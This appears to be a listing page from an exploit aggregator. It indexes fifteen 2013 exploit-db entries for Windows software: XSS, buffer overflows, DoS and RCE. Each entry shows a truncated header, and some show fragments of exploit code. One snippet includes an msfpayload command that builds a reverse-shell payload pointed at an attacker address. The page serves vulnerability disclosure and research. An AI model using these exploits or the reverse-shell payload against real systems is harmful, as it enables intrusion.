windows exploits
Page 2 of 4526 exploits
Title Author Platform Source Description Date
Syslog Watcher Pro 2.8.0.812 - (Date Parameter) - Cross Site Scripting Vulnerability demonalex windows exploit-db.com Title: Syslog Watcher Pro 'Date' Parameter Cross Site Scripting Vulnerability Software : Syslog Watcher Pro Software Version : v2.8.0.812(Jun 15, 2009) Vendor: http://www.snmpsoft.com/ Vulnerability Published : 2013-04-27 Vulnerability Update Time : Status : Impact : Medium(CVSS2 May 1
Ipswitch IMail 11.01 - XSS Vulnerability DaOne windows exploit-db.com !/usr/bin/perl Exploit Title: Ipswitch IMail 11.01 XSS Vulnerability Date: 26-04-2013 Author: DaOne aka Mocking Bird Vendor Homepage: http://www.ipswitch.com/ Platform: windows use Net::SMTP; ARGV Check if ($ARGV != 2) { print "\nUSAGE: IMail.pl April 29
Windows Light HTTPD 0.1 - Buffer Overflow Jacob Holcomb windows exploit-db.com import urllib2 from time import sleep Title************************Windows Light HTTPD v0.1 HTTP GET Buffer Overflow Discovered and Reported******24th o April 25
SAP ConfigServlet Remote Unauthenticated Payload Execution Andras Kabai windows exploit-db.com require 'msf/core' class Metasploit3 < Msf::Exploit include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStagerVBS def initialize(info = {}) super(update_info(info, 'Name' => 'SAP ConfigServlet OS Command Execution', 'Description' => %q{ This mo April 25
Flightgear 2.0, 2.4 - Remote Format String Exploit Kurono windows exploit-db.com /* Exploit Title: Flightgear remote format string Date: 21/04/2013 Exploit Author: Kurono email: andresgomezram7@gmail.com Vendor Homepage: http://www.flightgear.org/ Software Link: http://www.flightgear.org/download/ Version: Tested on versions 2.0, 2.4. Tested on: Windows April 22
Mikrotik Syslog Server for Windows 1.15 - Denial of Service xis_one windows exploit-db.com Exploit Title: Mikrotik Syslog Server for Windows - remote BOF DOS Date: 19.04.2013 Exploit Author: xis_one@STM Solutions Vendor Homepage: www.mikrotik.com Software Link: http://www.mikrotik.com/download/MT_Syslog.exe Version: 1.15 (most recent version 19.04.2013) Tested on: April 22
Java Web Start Launcher ActiveX Control - Memory Corruption SEC Consult windows exploit-db.com SEC Consult Vulnerability Lab Security Advisory < 20130417-1 > = title: Java ActiveX Control Memory Corruption product: Java(TM) Web Start Launcher vulnerable version: Sun Java Version 7 Update 17 an April 18
Foxit Reader 5.4.3.* - 5.4.5.0124 - PDF XREF Parsing Denial of Service Vulnerability FuzzMyApp windows exploit-db.com Exploit Title: Foxit Reader 5.4.3.* - 5.4.5.0124 - PDF (Portable Document Format) XREF (Cross Reference Table) parsing Denial of Service Vulnerability Date (found): 2012.11.17 Date (publish): 2013.04.17 Exploit Author: FuzzMyApp Vendor Homepage: http://www.foxitsoftware.com Version: April 18
Oracle WebCenter Sites Satellite Server - HTTP Header Injection SEC Consult windows exploit-db.com SEC Consult Vulnerability Lab Security Advisory < 20130417-2 > = title: HTTP header injection/Cache poisoning in Oracle WebCenter Sites Satellite Server product: Oracle WebCenter April 18
FirePHP Firefox Plugin 0.7.1 - Remote Command Execution Wireghoul windows exploit-db.com Exploit Title: Firephp firefox plugin RCE Date: 17/04/2013 Exploit Author: Wireghoul Vendor Homepage: www.firephp.org Software Link: https://addons.mozilla.org/en-US/firefox/addon/firephp/versions/ Version: All versions up to and including 0.7.1 Tested on: Windows 7 Advisory: April 17
AT-TFTP Server 2.0 - Stack Based Buffer Overflow DoS xis_one windows exploit-db.com Exploit Title: AT-TFTP 2.0 long filename stack based buffer overflow - DOS Date: 12.04.2013 Exploit Author: xis_one@STM Solutions Vendor Homepage: http://www.alliedtelesis.com/ Software Link: http://alliedtelesis.custhelp.com/cgi-bin/alliedtelesis.cfg/php/enduser/std_adp.php?p_faqid April 12
KNet Web Server 1.04b - Stack Corruption BoF Wireghoul windows exploit-db.com !/usr/bin/perl KNet Web Server Stack corruption BoF PoC Written by Wireghoul - http://www.justanotherhacker.com Date: 2013/04/11 Version: 1.04b Tested on: WinXP SP3 use IO::Socket::INET; $host = shift; $port = shift; print "KNet Web Server stack corruption BoF PoC - Wireghoul - April 12
FreeFloat FTP 1.0 - DEP Bypass with ROP negux windows exploit-db.com !usr/bin/python Exploit title: FreeFloat ftp 1.0 DEP bypass with ROP Exploit Author: negux POC: http://www.exploit-db.com/exploits/24479/ Tested on : Windows XP SP 3 Spanish import socket,struct msfpayload windows/shell_reverse_tcp LHOST=192.168.1.117 LPORT=443 R | msfenco April 10
BigAnt Server 2.97 - DDNF Username Buffer Overflow Craig Freyman windows exploit-db.com !/usr/bin/python Title: BigAnt Server 2.97 DDNF Username Buffer Overflow Author: Craig Freyman (@cd1zz) http://pwnag3.com Tested on: Windows 7 64 bit (DEP/ASLR Bypass) Similar Exploits: http://www.exploit-db.com/exploits/24528/ http://www.exploit-db.com/exploits/24527/ http://www.exp April 10
Groovy Media Player 3.2.0 (.mp3) - Buffer Overflow Vulnerability Akshaysinh Vaghel. windows exploit-db.com Title: Groovy Media Player 3.2.0 Buffer Overflow Vulnerability Credit: Name: Akshaysinh Vaghela Company/affiliation: Cyberoam Technologies Private Limited Website: www.cyberoam.com CVE: = CVE-2013-2760 (Reserved) Date: 21-03-2013 CL-ID: C April 8